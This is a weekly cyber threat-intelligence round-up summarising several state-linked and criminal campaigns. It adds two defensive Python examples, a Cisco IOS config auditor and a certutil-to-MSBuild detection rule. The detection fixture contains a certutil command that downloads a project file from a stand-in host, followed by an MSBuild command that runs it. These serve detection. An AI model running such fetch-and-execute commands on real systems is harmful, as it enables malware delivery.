
Weekly Cyber Round-up

Intelligence Report

August 21, 2025

Static Tundra espionage campaign targets end-of-life Cisco networking devices

Cisco Talos researchers observed the Russian state-sponsored threat actor Static Tundra targeting unpatched Cisco IOS and Cisco IOS XE software for long-term espionage and to extract device configuration information. The group has been exploiting a critical remote code execution flaw, tracked as CVE-2018-0171, in the Smart Install feature of the devices since at least 2021. Organizations in the telecommunications, higher education, and manufacturing sectors across North America, Asia, Africa, and Europe have been targeted. Static Tundra uses bespoke tooling to automate exploitation and configuration extraction against target IP addresses, which are identified using services like Shodan or Censys. Once access is achieved, the group spoofs SNMP traffic source addresses to obfuscate its infrastructure and bypass access control lists, and deploys the SYNful Knock Cisco IOS firmware implant to maintain persistence. It establishes generic routing encapsulation (GRE) tunnels to redirect traffic of interest, while exfiltrating NetFlow data through various means, including inbound TFTP connections. A Federal Bureau of Investigation advisory also warns that actors linked to the Russian Federal Security Service's Center 16 are exploiting CVE-2018-0171 against critical infrastructure. Patches for CVE-2018-0171 are available.
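The artefacts Talos lists above (Smart Install left reachable, GRE tunnel interfaces, NetFlow export, TFTP and SNMP) all show up in a device's running-config, so a defender can audit exported configs for them. The following is an added example written for this round-up, not Cisco Talos tooling; the running-config it parses is constructed, the hostnames and addresses are hypothetical, and the `KNOWN_COLLECTORS` set stands in for an organisation's real NetFlow collector list. It treats the absence of an explicit `no vstack` as a finding because the Smart Install client is on by default on many IOS switches.

```python
"""Audit a Cisco IOS / IOS XE running-config for the exposures and
post-exploitation artefacts described in the Static Tundra report:
Smart Install left enabled (CVE-2018-0171), GRE tunnel interfaces,
NetFlow export to an unrecognised collector, TFTP server directives
and weak SNMP communities. Added example; not Cisco Talos code."""
import re
from dataclasses import dataclass
from typing import Iterator, List, Set, Tuple

# Constructed sample running-config; hostname and addresses are hypothetical.
SAMPLE_CONFIG = """\
hostname edge-sw-01
!
interface Tunnel10
 ip address 10.99.0.1 255.255.255.252
 tunnel source GigabitEthernet0/1
 tunnel destination 198.51.100.77
 tunnel mode gre ip
!
ip flow-export destination 198.51.100.77 9996
!
tftp-server flash:running-config
!
snmp-server community public RW
!
access-list 10 permit 192.0.2.0 0.0.0.255
"""

# Assumed: the organisation's legitimate NetFlow collector(s).
KNOWN_COLLECTORS: Set[str] = {"10.0.0.50"}


@dataclass
class Finding:
    severity: str  # "high" or "medium"
    check: str     # which check fired
    detail: str    # evidence taken from the config


def _sections(lines: List[str]) -> Iterator[Tuple[str, List[str]]]:
    """Yield (header, indented body lines) for each top-level config statement.
    IOS separates statements with '!' and indents sub-commands with a space."""
    header, body = None, []
    for line in lines + ["!"]:
        if line.startswith(" "):
            body.append(line.strip())
            continue
        if header is not None:
            yield header, body
        header, body = (line.strip() or None), []
        if header == "!":
            header = None


def audit_ios_config(config: str, known_collectors: Set[str] = KNOWN_COLLECTORS) -> List[Finding]:
    sections = list(_sections(config.splitlines()))
    headers = [h for h, _ in sections]
    findings: List[Finding] = []

    # Smart Install: the client is enabled by default on many IOS switches, so only an
    # explicit 'no vstack' (Cisco's documented way to disable it) proves it is off.
    if "no vstack" not in headers:
        findings.append(Finding("high", "smart-install",
                                "'no vstack' absent: Smart Install client may still listen on TCP 4786"))

    # GRE tunnels: the report describes GRE used to redirect traffic of interest,
    # so every Tunnel interface and its destination is surfaced for review.
    for header, body in sections:
        if header.startswith("interface Tunnel"):
            dest = next((b.split()[-1] for b in body if b.startswith("tunnel destination")), "unknown")
            mode = next((b for b in body if b.startswith("tunnel mode")), "tunnel mode gre ip (IOS default)")
            findings.append(Finding("medium", "gre-tunnel", f"{header} -> {dest} ({mode})"))

    for header in headers:
        # NetFlow export to anything other than the known collectors
        m = re.match(r"ip flow-export destination (\S+) (\d+)", header)
        if m and m.group(1) not in known_collectors:
            findings.append(Finding("high", "netflow-export",
                                    f"NetFlow exported to unrecognised collector {m.group(1)}:{m.group(2)}"))
        # tftp-server exposes flash files (configs included) to inbound TFTP requests
        if header.startswith("tftp-server "):
            findings.append(Finding("high", "tftp-server", header))
        # SNMP: read-write access or a well-known community string
        m = re.match(r"snmp-server community (\S+)(?: (RO|RW))?", header)
        if m:
            community, mode = m.group(1), m.group(2) or "RO"
            if mode == "RW" or community.lower() in {"public", "private"}:
                findings.append(Finding("high", "snmp-community", f"community '{community}' mode {mode}"))
    return findings


if __name__ == "__main__":
    for f in audit_ios_config(SAMPLE_CONFIG):
        print(f"[{f.severity:6}] {f.check:15} {f.detail}")
```

Run against an exported `show running-config`, the constructed sample produces five findings; a config with `no vstack`, no tunnel interfaces, NetFlow sent only to a known collector and a read-only, non-default SNMP community produces none. Tunnel interfaces are reported at medium severity because they are legitimate on many routers; the point is that each destination gets an owner.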


Modular PipeMagic backdoor leveraged in Storm-2460 and Middle East ransomware attacks

Microsoft researchers analyzed PipeMagic, a modular backdoor that Storm-2460 has used in attacks against the United States, Europe, South America, and the Middle East. The malware can dynamically execute payloads, and its modular structure gives the attackers fine-grained control over code execution while making detection and analysis more difficult. PipeMagic has been observed being dropped and executed in memory via a malicious MSBuild file downloaded using the certutil utility. The attackers then exploited a then-zero-day vulnerability, tracked as CVE-2025-29824, in the Windows Common Log File System, and ultimately deployed ransomware. PipeMagic communicates with its C2 server over TCP and receives payload modules from it, organizing them in a series of doubly linked lists for staging, execution, and communication. Kaspersky researchers also observed PipeMagic being delivered to Middle Eastern organizations in October 2024 under the guise of ChatGPT client applications, with new infections observed in Saudi Arabia and Brazil in January 2025. The 2025 variants of PipeMagic contain improved persistence and lateral movement mechanisms, and have been delivered via a Microsoft Help Index File and DLL hijacking.
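The delivery chain Microsoft describes (certutil fetching a file, then MSBuild running it) is visible in ordinary process-creation telemetry. Below is an added detection example written for this round-up, not Microsoft or Kaspersky code: it walks a list of constructed Sysmon-style process-creation records (the hosts, URLs and paths are hypothetical) and raises one alert per MSBuild execution that follows a certutil URL fetch on the same host within a time window, or that runs a project from a user-writable directory. The ten-minute window and the set of user-writable paths are assumptions to tune per environment.

```python
"""Flag the PipeMagic delivery pattern: certutil used to fetch a file from a
URL, followed on the same host by MSBuild executing a project from a
user-writable location. Added example, not vendor code; the events below are
constructed Sysmon-style records with hypothetical hosts, URLs and paths."""
import re
from datetime import datetime, timedelta
from typing import Dict, List

EVENTS: List[Dict[str, str]] = [
    {"ts": "2025-08-20T10:01:02", "host": "WS-17",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://203.0.113.9/build.proj C:\Users\Public\build.proj"},
    {"ts": "2025-08-20T10:01:40", "host": "WS-17",
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "cmdline": r"MSBuild.exe C:\Users\Public\build.proj"},
    {"ts": "2025-08-20T11:30:00", "host": "BUILD-02",   # legitimate developer build
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "cmdline": r"MSBuild.exe D:\src\app\app.sln /t:Build"},
    {"ts": "2025-08-20T12:00:00", "host": "WS-21",      # benign certutil use
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -hashfile C:\Temp\installer.msi SHA256"},
]

# certutil invoked with a URL or its cache-download switch
CERTUTIL_FETCH = re.compile(r"-urlcache|https?://", re.I)
# Assumed set of locations a normal user can write to; tune per environment.
USER_WRITABLE = re.compile(r"\\Users\\Public\\|\\AppData\\|\\Temp\\|\\ProgramData\\", re.I)


def detect_certutil_msbuild_chain(events: List[Dict[str, str]],
                                  window: timedelta = timedelta(minutes=10)) -> List[Dict[str, object]]:
    """Return one alert per suspicious MSBuild execution, with the reasons it fired."""
    recent_fetches: Dict[str, List[datetime]] = {}   # host -> timestamps of certutil fetches
    alerts: List[Dict[str, object]] = []
    for e in sorted(events, key=lambda ev: ev["ts"]):  # ISO-8601 strings sort chronologically
        ts = datetime.fromisoformat(e["ts"])
        image = e["image"].lower()
        if image.endswith("\\certutil.exe") and CERTUTIL_FETCH.search(e["cmdline"]):
            recent_fetches.setdefault(e["host"], []).append(ts)
        elif image.endswith("\\msbuild.exe"):
            reasons: List[str] = []
            fetched = [t for t in recent_fetches.get(e["host"], []) if timedelta(0) <= ts - t <= window]
            if fetched:
                reasons.append(f"certutil URL fetch {int((ts - fetched[-1]).total_seconds())}s earlier")
            if USER_WRITABLE.search(e["cmdline"]):
                reasons.append("MSBuild project in user-writable path")
            if reasons:
                alerts.append({"host": e["host"], "ts": e["ts"],
                               "cmdline": e["cmdline"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect_certutil_msbuild_chain(EVENTS):
        print(alert["host"], alert["ts"], "; ".join(alert["reasons"]))
```

On the constructed events only the WS-17 sequence alerts, with both reasons attached; the developer build on BUILD-02 and the certutil hash check on WS-21 stay silent. Keying the correlation on host rather than on process ancestry keeps the rule working when certutil and MSBuild are launched by different parents.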

Phishing campaign targets Indian Android users with government electricity subsidy lures

McAfee researchers discovered an ongoing Android phishing campaign targeting Indian users by impersonating a government electricity subsidy service. The campaign aims to lure victims into installing a malicious app that not only steals financial information, but also steals text messages, sends smishing messages to the user's contacts, and uses Firebase as a C2 channel. The attack begins with a promotional YouTube video claiming users can receive government electricity subsidies through a mobile app. The video includes a shortened URL that redirects to a phishing site hosted on GitHub, which is designed to mimic an official Indian government portal and features a Google Play icon. Victims are guided through a fake registration process in which downloading the supposed app first installs a legitimate APK named PMBY, which in turn installs a malware APK named PMMBY under the guise of a security update. Upon installation, the PMMBY application requests extensive permissions and displays a fake electricity provider selection screen. Users are then prompted to fill out a fake registration form and make a payment, ultimately leading to the theft of their sensitive and financial information.

APT36 targets Indian government and defense entities in espionage campaign

In August 2025, CloudSEK researchers observed the Pakistan-linked advanced persistent threat group APT36 launching a new cyberespionage campaign against Indian government and defense entities. APT36 used phishing ZIP files containing malicious Linux '.desktop' shortcuts, disguised as PDF documents, to download dropper payloads from Google Drive. The shortcut decodes a hex-encoded payload and adjusts its permissions before executing the dropper binary. It then opens a decoy PDF file in Firefox, while the dropper performs several actions, including executing anti-debugging and anti-sandbox checks, establishing persistence on the infected system, and attempting to connect to its C2 server via WebSocket.

Scaly Wolf targets Russian engineering company with Updatar and Meterpreter backdoors

Doctor Web researchers detailed a targeted cyberattack against a Russian engineering enterprise that took place between May and June 2025. The attackers sent phishing emails with finance-themed lures containing either a decoy PDF or a ZIP archive to deliver malicious executables. Among the delivered malware were the custom modular Updatar trojan and the Meterpreter backdoor, alongside various open-source tools. Updatar was used for file theft, with persistence achieved via BITS tasks that were also used to deliver Meterpreter. The open-source tools included Chisel and FRP for tunneling, the HandleKatz credential dumping utility, and remote administration software such as RDP Wrapper and RemCom. The attackers used RockYou Obfuscation to hinder analysis of the Updatar samples, and attempted to disable Windows Defender and Dr.Web protections via PowerShell commands and registry edits. The campaign has been attributed to the advanced persistent threat actor Scaly Wolf. The researchers identified infrastructure and code overlaps linking the Updatar modules and supporting malware to a Scaly Wolf operation that targeted the same company in 2023. The more recent attack indicates a shift away from using malware-as-a-service for initial access.

Ransomware

Europol Says Qilin Ransomware Reward Fake (SecurityWeek RSS Feed – Aug 21 2025)
Warlock: From SharePoint Vulnerability Exploit to Enterprise Ransomware (Trend Micro – Aug 20 2025)
Pakistani Oil and Gas Sector Under Attack from Blue Locker Ransomware (SC Magazine UK – Aug 19 2025)
The State of Ransomware in Retail 2025 (Sophos – Aug 19 2025)
US Seizes $2.8 Million From Zeppelin Ransomware Operator (SecurityWeek RSS Feed – Aug 18 2025)
This 'SAP Ariba Quote' Isn't What It Seems—It's Ransomware (Cofense – Aug 14 2025)

Financial Services

GodRAT – New RAT targeting financial institutions (Kaspersky Lab – Aug 19 2025)
Someone's poking the bear with infostealers targeting Russian crypto developers (The Register – Security – Aug 18 2025)
ERMAC V3.0 Banking Trojan Source Code Leak Exposes Full Malware Infrastructure (The Hacker News – Aug 16 2025)
Lazarus Stealer: Android Malware for Russian Bank Credential Theft Through Overlay and SMS Manipulation (CYFIRMA – Aug 16 2025)
PhantomCard: New NFC-driven Android malware emerging in Brazil 🇧🇷 (Threat Fabric Blog – Aug 14 2025)

Geopolitics

Russian Hacktivists Take Aim at Polish Power Plant, Again (Dark Reading – Aug 19 2025)
Security Exclusive: DDoS hacktivists pressure Australia to boycott Israel (Cyber Daily – Aug 19 2025)
XenoRAT malware campaign hits multiple embassies in South Korea (Bleeping Computer – Aug 18 2025)
UAT-7237 targets Taiwanese web hosting infrastructure (Talos Intelligence Blog – Aug 15 2025)
Cybersecurity in Focus: Recent Threats Targeting India Amid Independence Day Celebrations (CloudSEK Blog – Aug 14 2025)

High Priority Vulnerabilities

Name             Software                 Base Score   Temp Score
CVE-2025-43300   iPadOS                   6.3          6.0
    Related: Actively exploited zero-day fixed in Apple iOS and iPadOS products
CVE-2025-8671    HTTP2                    7.5          7.2
    Related: HTTP/2 MadeYouReset flaw enables DoS attacks
CVE-2023-46604   Enterprise Data Quality  9.8          9.8
    Related: Patching for persistence: How DripDropper Linux malware moves through the cloud
CVE-2025-54948   Apex One                 9.8          9.4
    Related: U.S. CISA adds Trend Micro Apex One flaw to its Known Exploited Vulnerabilities catalog
CVE-2025-47227   ScriptCase               7.5          5.1
    Related: ScriptCase vulnerabilities can be chained for pre-authenticated remote command execution
